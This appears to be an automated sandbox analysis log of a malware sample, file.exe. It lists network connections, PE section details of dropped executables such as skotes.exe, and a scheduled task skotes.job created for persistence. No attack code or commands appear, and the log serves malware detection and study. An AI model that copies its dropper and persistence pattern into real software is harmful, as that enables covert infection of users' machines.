Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 50136 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 50138 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 50104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown	Network traffic detected: HTTP traffic on port 50126 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50134 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50098
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50097
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50099
Source: unknown	Network traffic detected: HTTP traffic on port 50112 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50075 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 50087 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49971 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50124 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 49948 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50146 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50097 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.5:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.5:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49889 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.5:49935 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:50007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:50054 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.5:50119 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50124 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50126 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50127 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50128 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50131 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50134 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50135 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50150 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50152 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50153 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50155 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50157 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50160 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50162 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50164 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50171 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50173 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50175 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50176 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50178 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50180 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50181 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50184 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: DocumentsJDAKJDAAFB.exe.0.dr	Static PE information: section name:
Source: DocumentsJDAKJDAAFB.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.19.dr	Static PE information: section name:
Source: skotes.exe.19.dr	Static PE information: section name: .idata
Source: random[1].exe.23.dr	Static PE information: section name:
Source: random[1].exe.23.dr	Static PE information: section name: .idata
Source: 167c7bdf2f.exe.23.dr	Static PE information: section name:
Source: 167c7bdf2f.exe.23.dr	Static PE information: section name: .idata
Source: random[1].exe0.23.dr	Static PE information: section name:
Source: random[1].exe0.23.dr	Static PE information: section name: .rsrc
Source: random[1].exe0.23.dr	Static PE information: section name: .idata
Source: random[1].exe0.23.dr	Static PE information: section name:
Source: d77e539f5f.exe.23.dr	Static PE information: section name:
Source: d77e539f5f.exe.23.dr	Static PE information: section name: .rsrc
Source: d77e539f5f.exe.23.dr	Static PE information: section name: .idata
Source: d77e539f5f.exe.23.dr	Static PE information: section name:
Source: random[2].exe.23.dr	Static PE information: section name:
Source: random[2].exe.23.dr	Static PE information: section name: .idata
Source: 85c9ba9a2d.exe.23.dr	Static PE information: section name:
Source: 85c9ba9a2d.exe.23.dr	Static PE information: section name: .idata

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C6BB700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB8C0 rand_s,NtQueryVirtualMemory,	0_2_6C6BB8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C6BB910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C65F280

Source: C:\Users\user\DocumentsJDAKJDAAFB.exe

File created: C:\Windows\Tasks\skotes.job

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6535A0	0_2_6C6535A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C665440	0_2_6C665440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C545C	0_2_6C6C545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C542B	0_2_6C6C542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CAC00	0_2_6C6CAC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C695C10	0_2_6C695C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A2C10	0_2_6C6A2C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65D4E0	0_2_6C65D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C696CF0	0_2_6C696CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6664C0	0_2_6C6664C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67D4D0	0_2_6C67D4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B34A0	0_2_6C6B34A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BC4A0	0_2_6C6BC4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C666C80	0_2_6C666C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66FD00	0_2_6C66FD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67ED10	0_2_6C67ED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C680512	0_2_6C680512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B85F0	0_2_6C6B85F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C690DD0	0_2_6C690DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C6E63	0_2_6C6C6E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65C670	0_2_6C65C670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A2E4E	0_2_6C6A2E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C674640	0_2_6C674640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C679E50	0_2_6C679E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C693E50	0_2_6C693E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B9E30	0_2_6C6B9E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A5600	0_2_6C6A5600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C697E10	0_2_6C697E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C76E3	0_2_6C6C76E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65BEF0	0_2_6C65BEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66FEF0	0_2_6C66FEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B4EA0	0_2_6C6B4EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BE680	0_2_6C6BE680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C675E90	0_2_6C675E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C669F00	0_2_6C669F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C697710	0_2_6C697710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65DFE0	0_2_6C65DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C686FF0	0_2_6C686FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A77A0	0_2_6C6A77A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69F070	0_2_6C69F070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C678850	0_2_6C678850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67D850	0_2_6C67D850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69B820	0_2_6C69B820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A4820	0_2_6C6A4820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C667810	0_2_6C667810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67C0E0	0_2_6C67C0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6958E0	0_2_6C6958E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C50C7	0_2_6C6C50C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6860A0	0_2_6C6860A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66D960	0_2_6C66D960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AB970	0_2_6C6AB970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CB170	0_2_6C6CB170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67A940	0_2_6C67A940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65C9A0	0_2_6C65C9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68D9B0	0_2_6C68D9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C695190	0_2_6C695190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B2990	0_2_6C6B2990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C699A60	0_2_6C699A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C671AF0	0_2_6C671AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69E2F0	0_2_6C69E2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C698AC0	0_2_6C698AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6522A0	0_2_6C6522A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C684AA0	0_2_6C684AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66CAB0	0_2_6C66CAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C2AB0	0_2_6C6C2AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CBA90	0_2_6C6CBA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66C370	0_2_6C66C370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C655340	0_2_6C655340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69D320	0_2_6C69D320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C53C8	0_2_6C6C53C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65F380	0_2_6C65F380
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70AC60	0_2_6C70AC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7DAC30	0_2_6C7DAC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7C6C00	0_2_6C7C6C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75ECD0	0_2_6C75ECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FECC0	0_2_6C6FECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7CED70	0_2_6C7CED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C88CDC0	0_2_6C88CDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C888D20	0_2_6C888D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C704DB0	0_2_6C704DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C82AD50	0_2_6C82AD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C796D90	0_2_6C796D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C79EE70	0_2_6C79EE70
